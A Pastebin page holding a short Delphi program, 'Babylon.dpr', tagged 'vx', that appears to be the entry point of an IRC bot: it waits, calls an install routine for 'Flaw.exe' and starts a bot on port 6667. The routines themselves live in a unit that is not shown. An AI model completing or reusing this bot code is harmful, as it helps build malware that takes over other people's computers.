Advertisement
FlyFar

Babylon.dpr

Jun 7th, 2023
872
1
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Delphi 0.19 KB | Cybersecurity | 1 0
  1.    program Babylon;
  2.  
  3.    uses
  4.      Windows,
  5.      Unit1 in 'Unit1.pas';
  6.  
  7.    begin
  8.      Sleep(5000);
  9.      Install('Flaw.exe', 'Flaw-Version-1.0');
  10.      StartBot('127.0.0.1', 6667);
  11.    end.
Tags: delphi pascal vx
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement